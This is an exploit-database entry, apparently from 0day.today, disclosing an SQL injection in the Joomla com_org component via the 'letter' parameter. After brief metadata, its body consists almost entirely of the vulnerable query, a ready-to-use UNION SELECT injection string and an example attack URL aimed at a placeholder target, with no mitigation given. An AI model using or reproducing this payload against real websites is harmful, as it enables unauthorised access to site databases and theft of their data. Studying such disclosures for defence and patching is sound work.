Joomla com_org SQL Injection Vulnerability (letter parameter)

🗓️ 15 Mar 2010 00:00:00Reported by kazuyaType

zdt🔗 0day.today👁 24 Views

Joomla com_org SQL Injection Vulnerability (letter parameter). SQL injection vulnerability found in Joomla com_org component using the letter parameter

=============================================================
Joomla com_org SQL Injection Vulnerability (letter parameter)
=============================================================

# Joomla com_org SQL Injection Vulnerability (letter parameter)
# Author: kazuya
# Mail: [email protected] Jabber: [email protected]
# Greetz to back2hack

# Vulnerability
# Query: SELECT count(*) FROM `jos_org` WHERE (`name` LIKE '<sql>%' || ...
# SQL: ')+union+select+0,0,0,1,0,2,0,0,0,0,0,0,0,0,0,0,0--+f
# Example: http://[target].com/index.php?option=com_org&letter=')+union+select+0,0,0,1,0,2,0,0,0,0,0,0,0,0,0,0,0--+f&task=indexs



#  0day.today [2018-03-28]  #

15 Mar 2010 00:00Current

7.1High risk

Vulners AI Score7.1